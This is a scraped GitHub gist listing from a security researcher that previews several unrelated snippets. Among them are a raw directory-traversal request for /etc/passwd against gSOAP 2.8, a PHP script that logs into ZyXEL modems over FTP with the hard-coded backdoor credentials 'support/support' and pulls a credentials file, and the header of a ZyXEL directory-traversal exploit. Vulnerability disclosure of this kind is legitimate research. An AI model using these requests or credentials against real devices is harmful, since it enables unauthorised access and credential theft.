Skip to content

Instantly share code, notes, and snippets.

numanturle

  • Diyarbakır
Block or report user

Report or block numanturle

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View gSOAP 2.8 Directory Traversal
Request
############################
GET /../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.200.106.101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
View gist:d7a89f13c70d0ffa9e9b30bb90ccc85f
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# encoding=utf8
import urllib.request
import urllib.error
import time
from multiprocessing import Pool
start = time.time()
@numanturle
numanturle / functions.php
Created Aug 30, 2019
wordpress thumbnail
View functions.php
<?php
add_action('add_attachment', 'rename_attachment');
function rename_attachment($post_ID){
$file = get_attached_file($post_ID);
$get_file_title = get_post($post_ID);
if($get_file_title->post_parent){
$post_santize_title = sanitize_title(get_the_title($get_file_title->post_parent));
$path = pathinfo($file);
$newfilename = $post_santize_title."-".$post_ID;
@numanturle
numanturle / Vmg3312 B10b Firmware 1.00(AAPP.7) backdoor account
Last active May 13, 2019
Vmg3312 B10b Firmware Vmg3312 B10b Firmware backdoor account
View Vmg3312 B10b Firmware 1.00(AAPP.7) backdoor account
root@bitforbyte:~/xxx# binwalk 100AAPP7D0.bin
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
131072 0x20000 JFFS2 filesystem, big endian
JFFS2 filesystem extract
total 1492
1049502 drwxr-xr-x 18 root root 4096 Oct 27 23:33 .
View ZyXEL VMG3312-B10B - Leak Credentials < 1.00(AAPP.7)
<?php
$ftp_server = "192.168.1.1"; // modem ip address
$ftp_conn = ftp_connect($ftp_server) or die("ftp server close");
$login = ftp_login($ftp_conn, "support", "support"); // backdoor
$local_file = "crackme";
$server_file = "/var/csamu"; // base64_encode files
if (ftp_get($ftp_conn, $local_file, $server_file, FTP_BINARY)) {
$open = file($local_file);
@numanturle
numanturle / Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access
Last active Nov 17, 2018
Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access - Details
View Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access
# Exploit Title: Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access < 5.13(AAXA.8)C0
# Date: 2018-11-17
# Exploit Author: numan türle @numanturle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/
# Tested on: macOS
# Fixed firmware: 5.13(AAXA.8)C0
@modem_gateway = "192.168.1.1" // default address
View tr_synonymous.data
herkesin|her insanın
kilo verme|zayıflama
ilahiyat|tanrı bilim
masraftır|harcamadır
sevincinden|luğundan
dediğine|söylediğine
dediğini|söylediğini
başlarda|başlangıçta
rahatsızlık|hastalık
civarlarda|yörelerde
View yedek.sh
#!/bin/sh
BACKUP=/tmp/backup.$$
NOW=$(date +"%Y-%m-%d")
FTPD="/yedek"
FTPS="SUNUCU"
FTPU="USER"
FTPP="PASS"
FTPPO="PORT"
DBS="dbname dbname2 mysql"
[ ! -d $BACKUP ] && mkdir -p $BACKUP || :
You can’t perform that action at this time.